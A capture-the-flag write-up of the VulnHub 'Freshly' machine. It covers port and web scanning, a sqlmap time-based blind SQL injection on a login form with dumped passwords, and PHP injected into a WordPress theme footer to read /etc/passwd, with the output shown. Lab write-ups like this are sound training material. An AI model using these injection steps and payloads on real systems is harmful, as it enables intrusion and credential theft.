Vulnhub - Freshly

not the droids

I continued to play with the vulnhub virtual machine and started the TopHatSec - Freshly.

"The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)"

Discovery

As always we need to know which ports are open.

nmap

# Nmap 6.47 scan initiated Thu Apr 16 19:13:39 2015 as: nmap -A -A -oA nmap 10.0.2.5
Nmap scan report for 10.0.2.5
Host is up (0.00087s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after:  2025-02-14T03:30:05+00:00
|_ssl-date: 2047-09-11T02:34:36+00:00; +32y147d13h20m44s from local time.
8080/tcp open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Thu Apr 16 19:13:52 2015 -- 1 IP address (1 host up) scanned in 12.77 seconds

There is three ports with a web server running:

  • The 80 just display an gif.
  • The 443 seems to be like the 8080 with SSL.
  • The 8080 is a wordpress website which seems to sell candy (who doesn't love candy?).

not the droids

I try to see if there was any differences between this gif and the original one, but nothing.

Nikto

I like to use Nikto when discovering website, I will put only the interesting stuff, but I ran Nikto on the 3 ports.

Port 80:

[maggick@rootine Freshly]$ nikto -host 10.0.2.5
Server: Apache/2.4.7 (Ubuntu)
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found

login.php

Port 8080:

[maggick@rootine Freshly]$ nikto -host 10.0.2.5 -port 8080
+ OSVDB-3268: /img/: Directory indexing found.
+ /wordpress/: A Wordpress installation was found

We got two login interfaces and a directory listing with images. Let's take a look at the wordpress installation.

wordpress, index

The directory listening was not of any use. As well the phpmyadmin interface was not usefull.

WPScan

We run wpscan on the 8080 website:

[maggick@rootine wpscan]$ ruby wpscan.rb --url http://10.0.2.5:8080/wordpress/
[+] URL: http://10.0.2.5:8080/wordpress/
[+] Started: Thu Apr 16 20:01:39 2015

[!] The WordPress 'http://10.0.2.5:8080/wordpress/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'http://10.0.2.5:8080/wordpress/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] XML-RPC Interface available under: http://10.0.2.5:8080/wordpress/xmlrpc.php

[+] WordPress version 4.1.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
 | 4 plugins found:

[+] Name: cart66-lite - v1.5.3
 |  Location: http://10.0.2.5:8080/wordpress/wp-content/plugins/cart66-lite/
 |  Readme: http://10.0.2.5:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7737
    Reference: https://research.g0blin.co.uk/g0blin-00022/
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442
[i] Fixed in: 1.5.4

[+] Name: contact-form-7 - v4.1
 |  Location: http://10.0.2.5:8080/wordpress/wp-content/plugins/contact-form-7/
 |  Readme: http://10.0.2.5:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] Name: proplayer - v4.7.9.1
 |  Location: http://10.0.2.5:8080/wordpress/wp-content/plugins/proplayer/
 |  Readme: http://10.0.2.5:8080/wordpress/wp-content/plugins/proplayer/readme.txt

[!] Title: ProPlayer 4.7.9.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/6912
    Reference: http://osvdb.org/93564
    Reference: http://www.exploit-db.com/exploits/25605/

[+] Name: all-in-one-seo-pack - v2.2.5.1
 |  Location: http://10.0.2.5:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://10.0.2.5:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt

[!] Title: All in One SEO Pack <= 2.2.5.1 - Authentication Bypass
    Reference: https://wpvulndb.com/vulnerabilities/7881
    Reference: http://jvn.jp/en/jp/JVN75615300/index.html
    Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0902
[i] Fixed in: 2.2.6

We got some nice results, three plug-in have security issues. Digging furtherer, we notice that:

  • All in One SEO Pack - Authentication Bypas: There was nothing in the metadata.
  • Cart66 Lite 1.5.3 - SQL Injection: Need to be authenticated
  • proplayer 4.7.9.1 - SQL Injection: Concerns a non available URL (you can run sqlmap on it to confirm this)

Therefore none of this will help us in this challenge.

Exploit

Nikto shows us some interesting URL. The login interface at login.php may be injectable.

sqlmap

We need to use burp in order to save the POST request to a file, an then we launch sqlmap on the login.php URL:

[maggick@rootine sqlmap]$ python2 sqlmap.py -r login_req -p user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-dbfa8f1}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[*] starting at 20:43:22

[20:43:22] [INFO] parsing HTTP request from '/home/maggick/work/chall/vulnhub/Freshly/login_req'
[20:43:22] [INFO] resuming back-end DBMS 'mysql'
[20:43:22] [INFO] testing connection to the target URL
[20:43:22] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=asdf' AND (SELECT * FROM (SELECT(SLEEP(5)))RaKL) AND 'KuPd'='KuPd&password=asdf&s=Submit
---
[20:43:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[20:43:22] [INFO] fetched data logged to text files under '/home/maggick/.sqlmap/output/10.0.2.5'

[*] shutting down at 20:43:22

Okay the user parameter is vulnerable to a time-based blind injection. Let's see what are the databases:

[maggick@rootine sqlmap]$ python2 sqlmap.py -r ~/work/chall/vulnhub/Freshly/longin_req -p user --dbs
back-end DBMS: MySQL 5.0.12
[...]
available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Let's dump the interesting databases, users and login:

users:

Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir       |
+----------+-----------+

login:

Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

So we got some passwords. Then let's use the wordpress password.

Admin, PHP and Flag

We got the admin password for http://10.0.2.5:8080/wordpress/wp-login.

wordpress, admin interface

As we want to read a file on the system, let's put some PHP code in the theme: We go to Appearance -> Editor -> Footer (footer.php) and add some PHP code in order to execute it, let's get the /etc/passwd file :

 <?php
$myfile = fopen("/etc/passwd", "r") or die("Unable to open file!");
echo fread($myfile,filesize("/etc/passwd"));
fclose($myfile);
?>

When we reload the index page we got the /etc/password file in the footer:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

Wut? We already got the flag! No need to root the system… sadly.

As there is not ssh port open, I tried to log on the VM with root:SuperSecretPassword and it simply worked.

Summary

This was a simple challenge, based on web pentesting. It was a bit short but nonetheless interesting.

Road to flag:

  • SQL injection on the /login.php interface
  • Get the wordpress admin password
  • As wordpress admin inject PHP code in the web site (via the theme)
  • Display /etc/passwd

Flag : "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"